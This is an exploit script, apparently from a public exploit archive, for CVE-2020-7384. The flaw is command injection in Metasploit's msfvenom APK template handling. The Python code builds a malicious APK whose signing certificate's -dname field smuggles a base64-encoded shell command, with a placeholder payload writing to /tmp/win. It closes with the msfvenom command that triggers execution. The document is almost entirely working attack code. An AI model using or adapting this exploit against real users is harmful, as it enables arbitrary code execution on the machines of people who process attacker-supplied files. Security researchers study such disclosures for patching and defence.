# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection  
# Exploit Author: Justin Steven  
# Vendor Homepage:  
# Software Link:  
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0  
# CVE : CVE-2020-7384  
#!/usr/bin/env python3  
import subprocess  
import tempfile  
import os  
from base64 import b64encode  
# Change me  
payload = 'echo "Code execution as $(id)" > /tmp/win'  
# b64encode to avoid badchars (keytool is picky)  
payload_b64 = b64encode(payload.encode()).decode()  
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"  
print(f"[+] Manufacturing evil apkfile")  
print(f"Payload: {payload}")  
print(f"-dname: {dname}")  
tmpdir = tempfile.mkdtemp()  
apk_file = os.path.join(tmpdir, "evil.apk")  
empty_file = os.path.join(tmpdir, "empty")  
keystore_file = os.path.join(tmpdir, "signing.keystore")  
storepass = keypass = "password"  
key_alias = "signing.key"  
# Touch empty_file  
open(empty_file, "w").close()  
# Create apk_file  
subprocess.check_call(["zip", "-j", apk_file, empty_file])  
# Generate signing key with malicious -dname  
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,  
"-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])  
# Sign APK using our malicious dname  
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,  
"-storepass", storepass, "-keypass", keypass, apk_file, key_alias])  
print(f"[+] Done! apkfile is at {apk_file}")  
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 -o /dev/null")